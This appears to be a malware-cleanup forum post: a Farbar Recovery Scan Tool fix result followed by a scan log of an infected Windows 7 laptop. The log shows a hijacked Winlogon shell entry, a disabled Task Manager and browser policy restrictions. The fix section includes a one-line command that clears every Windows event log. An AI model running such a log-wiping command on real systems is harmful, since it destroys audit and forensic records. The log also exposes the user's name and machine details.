CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:
 
 
*****************
 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D4A518A-DF9A-4EF5-B2C9-BCCA25713362}" => not found
"C:\Windows\System32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3A66CE80-4733-4203-9F7A-462BED78E89F}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA2E555B-536B-40B0-8F32-8AE50F08B90F}" => not found
"C:\Windows\System32\Tasks\igfxhk" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\igfxhk" => not found
"C:\Users\Vladana\AppData\Roaming\Terq" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D00D3C68-28B6-430D-83FD-061E0EAFCDA9}" => not found
"C:\Windows\System32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9194DE95-4B06-4F9D-B927-18DB5B401FBF}" => not found
"C:\Users\Vladana\AppData\Local\TNT2" => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5}" => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F}" => not found
HKLM\Software\Classes\PROTOCOLS\Handler\skype4com => not found
HKLM\Software\Classes\PROTOCOLS\Handler\WSKVAllmytubechrome => not found
 
 
Copy of FRST.txt:
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (18-11-2019 20:50:59)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Mixbyte Inc -> ) C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
HKLM-x32\...\Run: [NBKeyScan] => "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {52B88261-7B2C-4805-AC71-BEABEC2ACC7E} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8C89DC2A-A626-4A37-9C20-27E3EAD3A4E5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {AEC4A61B-DBB5-42E3-9467-8E539CA4C0CF} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {EF68E912-4810-45BB-A8DF-394E2CB49789} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
